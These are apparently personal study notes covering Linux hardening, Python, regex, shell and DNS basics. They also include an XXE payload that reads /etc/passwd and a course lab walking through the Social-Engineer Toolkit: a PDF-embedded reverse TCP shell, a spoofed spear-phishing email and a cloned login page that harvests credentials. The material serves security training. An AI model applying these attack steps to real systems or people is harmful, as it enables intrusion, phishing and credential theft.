\#not enough (eg: for docker)

Use reverse proxy (eg: nginx proxy manager)

Use an IPS (Intrusion Prevention System) eg: fail2ban

sudo apt install fail2ban
sudo systemctl enable fail2ban --now

sudo systemctl status fail2ban
\#for more info
sudo fail2ban-client status
\#jail list is just a collection of configuration files where you want to block specific ip addresses for services/ aka which service log it is looking in

\#for service specific details
sudo fail2ban-client status service \#eg: sshd

Isolate applications with App armor
- installed by default on ubuntu
- it uses profiles for every application to determine which files and permissions the application requires
```
\#see which profiles are currently running on your applications

sudo apparmor_status
# apps in the enforce mode are protected by app armor
```

[!info] How to protect Linux from Hackers // My server security strategy!
How To Protect Linux From Hackers, Malware, and other bad things that could infect your server!
https://youtu.be/Bx_HkLVBz9M

[Vault: Vulns & Attacks] XXE

Sat, 25 Oct 2025 08:42:42 GMT

XML External Entity (XXE)

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

XML

XML structures data by using tags, and provides a rigid schema mechanism that describes the nesting, presence, and type of tags. For example, XML is used in communicating data between client and server, or to locally serialize and store data.

The XML standard has a concept called an “entity”, which represents a unit of data and there are many different types of entities in the XML specification. There is a type of custom entity called an “XML External Entity" denoted by the use of the SYSTEM keyword. The entity specifies a URL where the entity is defined, using either HTTP or file protocols. External entities can be used to retrieve both remote and local files.

XML external entity injection (XXE) is an attack where untrusted data is provided to a misconfigured XML parser. If an XML parser is configured to allow external entities, attackers can take advantage of this to access internal resources, including the server’s file system and other connected systems.

In Action

Assume a POST request that receives data in XML

POST /profile/name 

<?xml version="1.0" ?>
<Profile >
	<name>Bob</name>
</Profile>

We can inject a payload like

POST /profile/name 

<?xml version="1.0" ?>
<!DOCTYPE foo [
  <!ENTITY topping2 SYSTEM "file:///etc/passwd">]>
<Profile >
  <name>Bob</name>
</Profile>

This may give a response containing the content of /etc/passwd In the example above, the web application trusted the XML input we provided when we intercepted and edited the POST request. By injecting our custom external entity, the XML parser processed the entity and retrieved the contents of the /etc/passwd file, and then displayed the contents of the file along with the user’s name. This was possible because the XML parser that the web application uses has not disabled the use of external entities. The vulnerable piece of code in our JavaScript app looks like:

const app = require("express")(),
const libxml = require("libxmljs");
app.post("/profile/name", (req, res) => {
  favorite = libxml.parseXml(req.body, { noent: true });
  editname(name)
});

The web application uses the libxml library as its parser library, as NodeJS doesn’t provide a native XML parser. The issue in this code is calling the XML parser with the noent:true option which allows for external entities. The code above uses the built in SimpleXMLElement class, which resolves entities by default.

XXE mitigation

The safest way to mitigate XXE attacks in most frameworks is by disabling document type definitions completely. This will remove the ability to create custom entities. If this isn’t an option for your application, you’ll need to disable external entities and external document type declarations, depending on the parser in use. In our situation, the parser libxmljs actually disables external entities by default! The noent:true option included when parsing the XML actually enabled it. So all we need to do is remove it!

[Vault: Languages] Python

Sat, 25 Oct 2025 05:38:56 GMT

Data Types

String

In Python, string data is data consisting of an ordered sequence of characters. Characters in a string may include letters, numbers, symbols, and spaces. These characters must be placed within quotation marks. Strings are immutable. Common functions: str() and len() and methods: .upper(), .lower(), .index(), .split()

Integer

In Python, integer data is data consisting of a number that does not include a decimal point

Float

Float data is data consisting of a number with a decimal point.

Boolean

Boolean data is data that can only be one of two values: either True or False.

List

List data is a data structure that consists of a collection of data in sequential form. Lists elements can be of any data type, such as strings, integers, Booleans, or even other lists. The elements of a list are placed within square brackets, and each element is separated by a comma. List is mutable. List methods include .insert(pos, element) , .remove(element), .append(element) and .index(element).

Tuple

Tuple data is a data structure that consists of a collection of data that cannot be changed. Like lists, tuples can contain elements of varying data types. A tuple is placed in parentheses rather than brackets.

Dictionary

Dictionary data is data that consists of one or more key-value pairs. Each key is mapped to a value. A colon (:) is placed between the key and value. Commas separate key-value pairs from other key-value pairs, and the dictionary is placed within curly brackets ({}).

Set

Set data is data that consists of an unordered collection of unique values. This means no two values in a set can be the same. Elements in a set are always placed within curly brackets and are separated by a comma. These elements can be of any data type.

Functions

A function is a section of code that can be reused in a program.

A parameter is an object that is included in a function definition for use in that function.
An argument is the data brought into a function when it is called.
When defining functions in Python, you use return statements if you want the function to return output. The return keyword is used to return information from a function.
A global variable is a variable that is available through the entire program. Global variables are assigned outside of a function definition.
A local variable is a variable assigned within a function. These variables cannot be called or accessed outside of the body of a function.

Working with files

The keyword with handles errors and manages external resources when used with other functions.
We can use it with the open() function in order to open a file. It will then manage the resources by closing the file after exiting the with statement.
The first parameter of the open() function is the absolute file path and the second parameter indicates what you want to do with the file.
"r" indicates that you want to read the file, "w" if you want to write to a file or "a" if you want to append to a file.
When you open a file using with open(), you must provide a variable that can store the file while you are within the with statement. You can do this through the keyword as followed by this variable name. The keyword as assigns a variable that references another object.
We can use the .read() method to read the contents of the file.
The .write() method writes string data to a specified file. you can use the .write() method with both "w" and "a".

Modules and libraries

A module is a Python file that contains additional functions, variables, and other kinds of runnable code. A Python library is a collection of modules.

The Python Standard Library is an extensive collection of Python code that often comes packaged with Python. It includes a variety of modules, each with pre-built code centered around a particular type of task. Modules in the Python Standard Library:
The re module, which provides functions used for searching for patterns in log files
The csv module, which provides functions used when working with .csv files
The glob and os modules, which provide functions used when interacting with the command line
The time and datetime modules, which provide functions used when working with timestamps

To import an entire Python Standard Library module, you use the import keyword. The import keyword searches for a module or library in a system and adds it to the local Python environment. To import a specific function from the Python Standard Library, you can use the from keyword.

In addition to the Python Standard Library, you can also download external libraries and incorporate them into your Python code. eg: Beautiful Soup (bs4) for parsing HTML files and NumPy (numpy) for arrays and mathematical computations.

Package management

Python package management involves installing, managing, and updating external libraries and modules required for Python projects. pip: is The standard package installer for Python, included by default with Python 3.4 and later. It is primarily used to install packages from the Python Package Index (PyPI).

pip install [package] 
pip install -r requirements.txt
pip uninstall [package]

To prevent compatibility issues with varying dependency versions we can include package versions in the requirement file too.

But if the dependencies of these dependencies have any breaking changes that will affect our project. So we can do Dependency pinning pip freeze > requirements.lock This is used in Python development to capture the exact versions of all installed packages in the current environment and save them to a file named requirements.lock.

Virtual environments

A Python virtual environment is an isolated Python installation with its own Python interpreter and packages, preventing conflicts between projects. Virtual environments are essential for reproducible, portable, and secure development, allowing different projects to use different package versions without affecting each other or the system's main Python installation.

The built-in venv module creates lightweight environments, while the standalone virtualenv tool offers similar functionality.

python -m venv venv
source venv/bin/activate  # On linux
venv\Scripts\activate   # On windows

pyenv

Sometimes a package may not work with the python version installed on our machine and may require a certain version of python to work. The pyenv command-line tool allows you to install and switch between multiple Python versions without interfering with your operating system's Python installation. We can pin the version of python by using a .python-version file in our project dir with python version we need. Then we can install the version required using pyenv install -s. pyenv will automatically change your path and use the correct python. Or we can manually run by using pyenv exec python

uv

UV (written in Rust) is an ultra-fast, all-in-one Python package and project manager designed to replace and unify tools like pip, venv, poetry, and pyenv.

uv init             # Create a new project
uv add [package]    # Install a package / add dependeny
uv remove [package] # Remove a package
uv sync             # Update the venv 
uv lock             # Update the lock file
uv publish          # Send package to PyPI
uv tree             # Show dependency tree

To run a python file:

uv run script.py

This will install the correct python version, create virtual environment and install the required packages for the project

Note: uv will store the dependencies in the pyproject.toml file instead of requirements.txt file.

[Vault: Root] Regex

Wed, 22 Oct 2025 17:51:29 GMT

A regular expression, sometimes referred to as rational expression, is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for "find" or "find and replace" operations on strings, or for input validation.

https://regex101.com

re module in python

Symbols for character types

| Symbol | Description | Example Match | | ------ | -------------------------------------------------------------------------------------------------------------------- | --------------------------------- | | \w | Matches any alphanumeric character (A-z, 0-9) OR an underscore (). | In "ID_A17", matches I,D,,A,1,7. | | \d | Matches any single digit (0-9). | In "ID_A17", matches 1,7. | | \s | Matches any single whitespace character (space, tab, newline). | Matches the space in "user 1". | | . | Matches any character (letters, digits, symbols, spaces), except for a newline. | | | . | Matches the literal period character (.). The backslash \ is necessary to escape the special meaning of the dot. | |

Symbols to quantify occurrences

| Symbol | Description | Example | | ------ | ------------------------------------------------------------ | --------------------------------------------------- | | + | One or more occurrences. (e.g., \d+ matches 1,12,12345). | | | * | Zero, one, or more occurrences. | | | {n} | Exactly n occurrences. | \d{4} matches four consecutive digits (e.g., 1234). | | {n,n} | Between m (minimum) and n (maximum) occurrences. | \d{1,3} matches 1,12, or 123. |

[Vault: Linux] Shell Commands

Tue, 21 Oct 2025 19:11:06 GMT

Create and Modify directories

mkdir

The mkdir command creates a new directory. Like all of the commands presented in this reading, you can either provide the new directory as the absolute file path, which starts from the root, or as a relative file path, which starts from your current directory.

rmdir

The rmdir command removes, or deletes, a directory. For example, entering rmdir /home/analyst/logs/network would remove this empty directory from the file system. Note: The rmdir command cannot delete directories with files or subdirectories inside. For example, entering rmdir /home/analyst returns an error message.

Creating and modifying files

touch and rm

The touch command creates a new file. This file won’t have any content inside. If your current directory is /home/analyst/reports, entering touch permissions.txt creates a new file in the reports subdirectory called permissions.txt. The rm command removes, or deletes, a file. This command should be used carefully because it’s not easy to recover files deleted with rm. To remove the permissions file you just created, enter rm permissions.txt. Pro Tip: You can verify that permissions.txt was successfully created or removed by entering ls.

mv and cp

You can also use mv and cp when working with files. The mv command moves a file or directory to a new location, and the cp command copies a file or directory into a new location. The first argument after mv or cp is the file or directory you want to move or copy, and the second argument is the location you want to move or copy it to. To move permissions.txt into the logs subdirectory, enter mv permissions.txt /home/analyst/logs. Moving a file removes the file from its original location. However, copying a file doesn’t remove it from its original location. To copy permissions.txt into the logs subdirectory while also keeping it in its original location, enter cp permissions.txt /home/analyst/logs. Note: The mv command can also be used to rename files. To rename a file, pass the new name in as the second argument instead of the new location. For example, entering mv permissions.txt perm.txt renames the permissions.txt file to perm.txt.

nano text editor

nano is a command-line file editor that is available by default in many Linux distributions. Many beginners find it easy to use, and it’s widely used in the security profession. You can perform multiple basic tasks in nano, such as creating new files and modifying file contents. To open an existing file in nano from the directory that contains it, enter nano followed by the file name. For example, entering nano permissions.txt from the /home/analyst/reports directory opens a new nano editing window with the permissions.txt file open for editing. You can also provide the absolute file path to the file if you’re not in the directory that contains it. You can also create a new file in nano by entering nano followed by a new file name. For example, entering nano authorized_users.txt from the /home/analyst/reports directory creates the authorized_users.txt file within that directory and opens it in a new nano editing window. Since there isn't an auto-saving feature in nano, it’s important to save your work before exiting. To save a file in nano, use the keyboard shortcut Ctrl + O. You’ll be prompted to confirm the file name before saving. To exit out of nano, use the keyboard shortcut Ctrl + X. Note: Vim and Emacs are also popular command-line text editors.

Standard output redirection

There’s an additional way you can write to files. Previously, you learned about standard input and standard output. Standard input is information received by the OS via the command line, and standard output is information returned by the OS through the shell. You’ve also learned about piping. Piping sends the standard output of one command as standard input to another command for further processing. It uses the pipe character (|). In addition to the pipe (|), you can also use the right angle bracket (>) and double right angle bracket (>>) operators to redirect standard output. When used with echo, the > and >> operators can be used to send the output of echo to a specified file rather than the screen. The difference between the two is that > overwrites your existing file, and >> adds your content to the end of the existing file instead of overwriting it. The > operator should be used carefully, because it’s not easy to recover overwritten files. When you’re inside the directory containing the permissions.txt file, entering echo "last updated date" >> permissions.txt adds the string “last updated date” to the file contents. Entering echo "time" > permissions.txt after this command overwrites the entire file contents of permissions.txt with the string “time”. Note: Both the > and >> operators will create a new file if one doesn’t already exist with your specified name.

Common commands for reading file content

we can use 'echo' command to write text

cat

The cat command displays the content of a file. For example, entering cat updates.txt returns everything in the updates.txt file.

head

The head command displays just the beginning of a file, by default 10 lines. The head command can be useful when you want to know the basic contents of a file but don’t need the full contents. Entering head updates.txt returns only the first 10 lines of the updates.txt file.

Pro Tip: If you want to change the number of lines returned by head, you can specify the number of lines by including -n. For example, if you only want to display the first five lines of the updates.txt file, enter head -n 5 updates.txt.

tail

The tail command does the opposite of head. This command can be used to display just the end of a file, by default 10 lines. Entering tail updates.txt returns only the last 10 lines of the updates.txt file.

Pro Tip: You can use tail to read the most recent information in a log file.

less

The less command returns the content of a file one page at a time. For example, entering less updates.txt changes the terminal window to display the contents of updates.txt one page at a time. This allows you to easily move forward and backward through the content. Once you’ve accessed your content with the less command, you can use several keyboard controls to move through the file:

Space bar: Move forward one page
b: Move back one page
Down arrow: Move forward one line
Up arrow: Move back one line
q: Quit and return to the previous terminal window

Filtering for information

grep

The grep command searches a specified file and returns all lines in the file containing a specified string or text. The grep command commonly takes two arguments: a specific string to search for and a specific file to search through. For example, entering grep OS updates.txt returns all lines containing OS in the updates.txt file. In this example, OS is the specific string to search for, and updates.txt is the specific file to search through. Let’s look at another example: grep error time_logs.txt. Here grep is used to search for the text pattern. error is the term you are looking for in the time_logs.txt file. When you run this command, grep will scan the time_logs.txt file and print only the lines containing the word error.

Piping

The pipe command is accessed using the pipe character (|). Piping sends the standard output of one command as standard input to another command for further processing. As a reminder, standard output is information returned by the OS through the shell, and standard input is information received by the OS via the command line. The pipe character (|) is located in various places on a keyboard. On many keyboards, it’s located on the same key as the backslash character (). On some keyboards, the | can look different and have a small space through the middle of the line. If you can’t find the |, search online for its location on your particular keyboard. When used with grep, the pipe can help you find directories and files containing a specific word in their names. For example, ls /home/analyst/reports | grep users returns the file and directory names in the reports directory that contain users. Before the pipe, ls indicates to list the names of the files and directories in reports. Then, it sends this output to the command after the pipe. In this case, grep users returns all of the file or directory names containing users from the input it received. Note: Piping is a general form of redirection in Linux and can be used for multiple tasks other than filtering. You can think of piping as a general tool that you can use whenever you want the output of one command to become the input of another command.

find

The find command searches for directories and files that meet specified criteria. There’s a wide range of criteria that can be specified with find. For example, you can search for files and directories that

Contain a specific string in the name,
Are a certain file size, or
Were last modified within a certain time frame. When using find, the first argument after find indicates where to start searching. For example, entering find /home/analyst/projects searches for everything starting at the projects directory. After this first argument, you need to indicate your criteria for the search. If you don’t include a specific search criteria with your second argument, your search will likely return a lot of directories and files. Specifying criteria involves options. Options modify the behavior of a command and commonly begin with a hyphen (-).

-name and -iname

One key criteria analysts might use with find is to find file or directory names that contain a specific string. The specific string you’re searching for must be entered in quotes after the -name or -iname options. The difference between these two options is that -name is case-sensitive, and -iname is not.

For example, you might want to find all files in the projects directory that contain the word “log” in the file name. To do this, you’d enter find /home/analyst/projects -name "log". You could also enter find /home/analyst/projects -iname "log".

In these examples, the output would be all files in the projects directory that contain log surrounded by zero or more characters. The "log" portion of the command is the search criteria that indicates to search for the string “log”. When -name is the option, files with names that include Log or LOG, for example, wouldn’t be returned because this option is case-sensitive. However, they would be returned when -iname is the option.

Note: An asterisk (*) is used as a wildcard to represent zero or more unknown characters.

-mtime

Security analysts might also use find to find files or directories last modified within a certain time frame. The -mtime option can be used for this search. For example, entering find /home/analyst/projects -mtime -3 returns all files and directories in the projects directory that have been modified within the past three days.

The -mtime option search is based on days, so entering -mtime +1 indicates all files or directories last modified more than one day ago, and entering -mtime -1 indicates all files or directories last modified less than one day ago.

Note: The option -mmin can be used instead of -mtime if you want to base the search on minutes rather than days.

Installing and update

sudo apt update && upgrade

we can also use the tool pimpmykali to update and setup our kali instance

when installing tools, install it to the opt folder

Integrated Linux support

Linux also has several commands that you can use for support.

man

The man command displays information on other commands and how they work. It’s short for “manual.” To search for information on a command, enter the command after man. For example, entering man chown returns detailed information about chown, including the various options you can use with it. The output of the man command is also called a “man page.”

You can output more information one line at a time by pressing the ENTER key or output the next page of the manual by pressing the space bar.

apropos

The apropos command searches the man page descriptions for a specified string. Man pages can be lengthy and difficult to search through if you’re looking for a specific keyword. To use apropos, enter the keyword after apropos. You can also include the -a option to search for multiple words. For example, entering apropos -a graph editor outputs man pages that contain both the words “graph" and "editor” in their descriptions.

whatis

The whatis command displays a description of a command on a single line. For example, entering whatis nano outputs the description of nano. This command is useful when you don't need a detailed description, just a general idea of the command. This might be as a reminder. Or, it might be after you discover a new command through a colleague or online resource and want to know more.

Shell operators

| Symbol / Operator | Description | | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------ | | & | This operator allows you to run commands in the background of your terminal. | | && | This operator allows you to combine multiple commands together in one line of your terminal. | | > | This operator is a redirector - meaning that we can take the output from a command (such as using cat to output a file) and direct it elsewhere. | | >> | This operator does the same function of the > operator but appends the output rather than replacing (meaning nothing is overwritten). |

[Vault: Networking] DNS

Tue, 21 Oct 2025 19:11:06 GMT

What is DNS?

Devices talk to each other using their IP addresses, but the problem is that these IP addresses aren't very memorable and could also change over time. Domain Name System (DNS) is the protocol responsible for resolving hostnames, such as google.com, to their respective [[IP and MAC Addresses|IP Address]] .

Domain Heirarchy

What is a domain name?

Anybody can pay a nominal fee and register their own domain name. There are three different types of domain names that can be registered:

Top-Level Domain - TLD

A TLD is the most righthand part of a domain name. So, for example, the google.com's TLD is .com. There are two types of TLD, gTLD (Generic Top Level) and ccTLD (Country Code Top Level Domain). Generic Top Level Domain - gTLD Historically a gTLD was meant to tell the user the domain name's purpose; for example, a .com would be for commercial purposes, .org for an organisation, .edu for education and .gov for government. Country Code Top-Level Domain - ccTLD These domain names are geographically based, such as .co.uk for the U.K, .fr for French domains, .au for Australian domains, etc. Even if you don't reside in those countries, you can usually register the domains anyway. Sponsored Top-Level Domain - sTLD These domains are usually more restricted and can only be registered by institutions; these include domains such as .edu, .gov, .mil, etc.

Second-Level Domain

Taking google.com as an example, the .com part is the TLD, and google is the Second Level Domain. When registering a domain name, the second-level domain is limited to 63 characters + the TLD and can only use a-z 0-9 and hyphens (cannot start or end with hyphens or have consecutive hyphens).

Subdomains

A subdomain is any text which sits before the domain name and is separated with a period (.) a subdomain is also referred to as a label. A subdomain name has the same creation restrictions as a Second-Level Domain, being limited to 63 characters and can only use a-z 0-9 and hyphens (cannot start or end with hyphens or have consecutive hyphens). You can use multiple subdomains split with periods to create longer names. But the length must be kept to 253 characters or less. There is no limit to the number of subdomains you can create for your domain name.

How does it work?

When you request a website, quite a lot of things happen in the background to get the IP address.

When you request a domain name, your computer first checks its local cache to see if you've previously looked up the address recently; if not, a request to your Recursive DNS Server will be made.
A Recursive DNS Server is usually provided by your ISP, but you can also choose your own. This server also has a local cache of recently looked up domain names. If a result is found locally, this is sent back to your computer, and your request ends here (this is common for popular and heavily requested services such as Google, Facebook, Twitter). If the request cannot be found locally, a journey begins to find the correct answer, starting with the internet's root DNS servers.
The root servers act as the DNS backbone of the internet; their job is to redirect you to the correct Top Level Domain Server, depending on your request. If, for example, you request example.com , the root server will recognise the Top Level Domain of .com and refer you to the correct TLD server that deals with .com addresses.
The TLD server holds records for where to find the authoritative server to answer the DNS request. The authoritative server is often also known as the nameserver for the domain. You'll often find multiple nameservers for a domain name to act as a backup in case one goes down.
An authoritative DNS server is the server that is responsible for storing the DNS records for a particular domain name and where any updates to your domain name DNS records would be made. Depending on the record type, the DNS record is then sent back to the Recursive DNS Server, where a local copy will be cached for future requests and then relayed back to the original client that made the request. DNS records all come with a TTL (Time To Live) value. This value is a number represented in seconds that the response should be saved for locally until you have to look it up again. Caching saves on having to make a DNS request every time you communicate with a server.

![[attachments/DNS-img-202510091530.png]]

DNS Record types:

A Type This is the record type that contains an IPv4 response such as 1.2.3.4 AAAA Type This record type contains an IPv6 response for hosts that support IPv6. MX Type This record advises the address of the server that handles the domain's email. CNAME Type This response points us to another DNS record. For example, if we had a shop hosted by Shopify we might have the address shopify.website.com with points to shops.myshopify.com then Shopify's DNS server will handle the request. NS Type This record advised the addresses of the name servers for the domain. A subdomain might handle its own DNS records so this is a useful record to point to other servers. TXT Type These records can contain textual information and can be used for multiple reasons, some common ones are providing confirmation that you have ownership over a domain for 3rd party services or the prevention of SPAM email. PTR Type A PTR record is like a reverse lookup for IP addresses. So you can search for an IP address and find the domain name which is associated with it.

DNS Status Codes

NOERROR - The query was successful, and data is returned. NXDOMAIN - The queried domain does not exist. (Non-Existent Domain) SERVFAIL - The server failed to process the query. REFUSED -The server refused to provide an answer.

[Vault: Tools] Social-Engineer Toolkit (SET)

Thu, 09 Oct 2025 18:08:01 GMT

The Social-Engineer Toolkit (SET) is a tool developed by David Kennedy. This tool can be used to launch numerous social engineering attacks and can be integrated with third-party tools and frameworks such as Metasploit. SET is installed by default in Kali Linux and Parrot Security. However, you can install it on other flavors of Linux as well as on macOS. You can download SET from https://github.com/trustedsec/social-engineer-toolkit.

create a spear phishing email using SET

Step 1 Launch SET by using the setoolkit command. You see the menu shown in Figure 4-2. Figure 4-2 - SET Main Menu ![[attachments/a25eddbc1697b02b2f29fec889321552_MD5.jpg|377x423]]

Step 2 Select 1) Social-Engineering Attacks from the menu to start the social engineering attack. You now see the screen shown in Figure 4-3.

Figure 4-3 - Social Engineering Attack Menu in SET

![[attachments/06c17beb0bcd77596c2f0bf2babeed5f_MD5.jpg|435x489]]

Step 3

Step 3. Select 1) Spear-Phishing Attack Vectors from the menu to start the spear-phishing attack. You see the screen shown in Figure 4-4.

Figure 4-4 - Spear-Phishing Attack Menu

![[attachments/7be038ebe817f7489ae0df32db428fbf_MD5.jpg]]

expand_less

Step 4

Step 4. To create a file format payload automatically, select 2) Create a FileFormat Payload. You see the screen shown in Figure 4-5.

Figure 4-5 - Creating a FileFormat Payload

![[attachments/6b9c15a698bf4e51bf6fbf67cc9cdc70_MD5.jpg]]

expand_less

Step 5

Step 5. Select 13) Adobe PDF Embedded EXE Social Engineering as the file format exploit to use. (The default is the PDF embedded EXE.) You see the screen shown in Figure 4-6.

Figure 4-6 - Adobe PDF Embedded EXE Social Engineering

![[attachments/59895dfa78397e8865592f95dc42d3f6_MD5.jpg]]

expand_less

Step 6

Step 6. To have SET generate a normal PDF with embedded EXE and use a built-in blank PDF file for the attack, select 2) Use built-in BLANK PDF for attack. You see the screen shown in Figure 4-7.

SET gives you the option to spawn a command shell on the victim machine after a successful exploitation. It also allows you to perform other post-exploitation activities, such as spawning a Meterpreter shell, Windows reverse VNC DLL, reverse TCP shell, Windows Shell Bind_TCP, and Windows Meterpreter Reverse HTTPS. Meterpreter is a post-exploitation tool that is part of the Metasploit framework. In Module 5, “Exploiting Wired and Wireless Networks,” you will learn more about the various tools that can be used in penetration testing.

Figure 4-7 - Configuring SET to Spawn a Windows Reverse TCP Shell on the Victim

![[attachments/f315bdab0e0352d716b238b29ab288cf_MD5.jpg]]

expand_less

Step 7

Step 7. To use the Windows reverse TCP shell, select 1) Windows Reverse TCP Shell. You see the screen shown in Figure 4-8.

Figure 4-8 - Generating the Payload in SET

![[attachments/eb986d1a094002a3ed94143e4e64f91e_MD5.jpg]]

expand_less

Step 8 - 9

Step 8. When SET asks you to enter the IP address or the URL for the payload listener, select the IP address of your attacking system (192.168.88.225 in this example), which is the default option since it automatically detects your IP address. The default port is 443, but you can change it to another port that is not in use in your attacking system. In this example, TCP port 1337 is used. After the payload is generated, the screen shown in Figure 4-9 appears.

Step 9. When SET asks if you want to rename the payload, select 2. Rename the file, I want to be cool. and enter chapter2.pdf as the new name for the PDF file.

Figure 4-9 - Renaming the Payload

![[attachments/54e4408caaa5923624b92c0651a1581c_MD5.jpg]]

expand_less

Step 10

Step 10. Select 1. E-Mail Attack Single Email Address. The screen in Figure 4-10 appears.

Figure 4-10 - Using a One-Time Email Template in SET

![[attachments/3788123fa195bf7d7dc536650f6b901e_MD5.jpg]]

expand_less

Step 11 - 14

Step 11. When SET asks if you want to use a predefined email template or create a one-time email template, select 2. One-Time Use Email Template.

Step 12. Follow along as SET guides you through the steps to create the one-time email message and enter the subject of the email.

Step 13. When SET asks if you want to send the message as an HTML message or in plaintext, select the default, plaintext.

Step 14. Enter the body of the message by typing or pasting in the text from Example 4-2, earlier in this module (see Figure 4-11).

Figure 4-11 - Sending the Email in SET

![[attachments/5af72bf10e1d9500ff79344d54b9781d_MD5.jpg]]

expand_less

Step 15 - 19

Step 15. Enter the recipient email address and specify whether you want to use a Gmail account or use your own email server or an open mail relay.

Step 16. Enter the “from” email address (the spoofed sender’s email address) and the “from name” the user will see.

Step 17. If you selected to use your own email server or open relay, enter the open-relay username and password (if applicable) when asked to do so.

Step 18. Enter the SMTP email server address and the port number. (The default port is 25.) When asked if you want to flag this email as a high-priority message, make a selection. The email is then sent to the victim.

Step 19. When asked if you want to set up a listener for the reverse TCP connection from the compromised system, make a selection.

Part 1: Launching SET and Exploring the Toolkit

Step 1: Load the SET application.

Start Kali Linux using the username kali and the password kali. Open a terminal session from the menu bar at the top of the screen.
SET must be run as root. Use the sudo -i command to obtain persistent root access. At the prompt, enter the command setoolkit to load the SET menu system. The Social Engineering Toolkit can also be run from the Applications >Social Engineering Tools >social engineering toolkit (root) choice on the Kali menu.

┌──(kali㉿Kali)-[~]

└─$ sudo -i

[sudo] password for kali:

┌──(root㉿Kali)-[~]

└─# setoolkit

If this is the first time that you have run SET, the license terms and conditions are displayed, and an agreement is required. Read the terms carefully.

After reading the disclaimer, enter y to accept the terms of service.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Do you agree to the terms of service [y/n]: y

The initial SET menu is displayed, as shown:

The Social-Engineer Toolkit is a product of TrustedSec.

        Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)

Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:

Social-Engineering Attacks
Penetration Testing (Fast-Track)
Third Party Modules
Update the Social-Engineer Toolkit
Update SET configuration
Help, Credits, and About
Exit the Social-Engineer Toolkit

set>

Step 2: Examine the Available Social-Engineering Attacks.

At the SET prompt, enter 1 and press Enter to access the Social-Engineering Attacks submenu.

set> 1

Select from the menu:

Spear-Phishing Attack Vectors
Website Attack Vectors
Infectious Media Generator
Create a Payload and Listener
Mass Mailer Attack
Arduino-Based Attack Vector
Wireless Access Point Attack Vector
QRCode Generator Attack Vector
Powershell Attack Vectors
Third Party Modules
Return back to the main menu.

Select each option to see a brief description of each exploit and what the tool does for each.

Note: Some options may not have a choice. In that case, use CTRL-C or enter 99 to return to the main menu.

Which option creates a DVD or USB thumb drive that will autorun malicious software when inserted into the target device?

Answer Area

Infectious Media Generator

Hide Answer

How could this functionality be used in a penetration test?

Answer Area

Answers will vary. The penetration tester could create and distribute some sort of benign malware on USB drives. The drives could be dropped in the parking lot and other open areas of the client facility. If the malware had a “phone home” functionality, the number of instances in which the USB drives were inserted into corporate computers could be quantified and reported.

Hide Answer

You are now ready to begin the web site cloning exploit.

Part 2: Cloning a Website to Obtain User Credentials

In this part of the lab, you will create a perfect copy of the login page for a website. The fake login page will gather all credentials submitted to it and then redirect the user to the real website.

Step 1: Investigate Web Attack Vectors in SET.

From the Social-Engineering Attacks submenu, choose 2) Website Attack Vectors to begin the web site cloning exploit.

set> 2

Review the brief attack description of each type of attack.

Which type of attack will you choose to create a cloned website to obtain login credentials for users on the target network?

Answer Area

Credential Harvester Attack Method

Hide Answer

Select 3) Credential Harvester Attack Method from the menu. A description of the ways to configure this exploit is displayed.

Which method enables you to use a custom website for the exploit that you create?

Answer Area

The third method 3) Custom Import

Hide Answer

Step 2: Clone the DVWA.vm Login Screen.

In this step, you will create a cloned website that duplicates the DVWA.vm login website. The SET application creates a website hosted on your Kali Linux computer. When the target users enter their credentials in the cloned website, the credentials and the users will be redirected to the real website without being aware of the exploit. This is similar to an on-path attack.

In this lab, we are using the internal website hosted on the DVWA.vm virtual machine. To see what the website looks like, open the Kali Firefox browser, and enter the URL http://DVWA.vm/. The login screen will appear. If the URL is not found, enter http://10.6.6.13/ to access the web server using its IP address.

What is the URL of the login screen?

Answer Area

DVWA.vm/login.php

Hide Answer

Return to the terminal session. Select 2) Site Cloner from the Credential Harvester Attack Method menu. Information describing which IP address is needed to host the fake website and to receive the POST data is displayed. Enter the web attacker IP address at the prompt. This is the IP address of the virtual Kali internal interface on the 10.6.6.0/24 network. In an actual exploit, this would be the external (internet facing) address of the attack computer.
At the prompt, enter the IP address 10.6.6.1.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]:10.6.6.1

Next, enter the URL of the website that you want to clone. This is the URL of the DVWA website, http://DVWA.vm.

[-] SET supports both HTTP and HTTPS

[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:http://DVWA.vm

[*] Cloning the website: http://DVWA.vm

[*] This could take a little bit...

When the website is cloned, the following message appears on the terminal.

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] The Social-Engineer Toolkit Credential Harvester Attack

[*] Credential Harvester is running on port 80

[*] Information will be displayed to you as it arrives below:

Note: No prompt will be returned to you. This is because a listener is now active on port 80 on the Kali computer and all port 80 traffic will be redirected to this screen. Do not close the terminal window. Continue to Part 3.

Part 3: Capturing and Viewing User Credentials

Step 1: Create the Social Engineering Exploit.

In a “real-life” exploit, at this point, a phishing exploit containing a link or QR code that sends the user to the fake website is created and sent. In this lab, an html document is created to direct the user to the fake webpage. This document simulates a distributed phishing URL. It could be distributed as a file attachment in phishing emails.

Open the Kali Linux Mousepad text editor using the Applications > Favorites > Text Editor choice from the menu. Enter the HTML code shown into the Mousepad document.

Select File > Save from the Mousepad menu. Name the document Great_link.html and save it in the /home/kali/Desktop Folder. The icon appears on the Kali desktop.
Close the Mousepad application.

Step 2: Capture User Credentials.

The purpose of the cloned website is to present a web page that looks identical to the one that the user is expecting. A good hacker would create a fake URL that would be very similar to the actual URL, so that unless the user inspects the URL very closely, it would go unnoticed.

Double-click the desktop icon for the Great_link.html page. The DVWA login page that you viewed in Part 2, Step 2a should appear in a browser window.

What URL appears on the browser now? Is it the same as the URL you recorded in Part 2, Step 2a?

Answer Area

The URL is http://10.6.6.1/ is displayed in the browser. No, they are not the same as in the previous part.

Hide Answer

Enter some information in the Username and Password fields and click Login to send the form.

Username: some.user@gmail.com

Password: Pa55w0rdd!

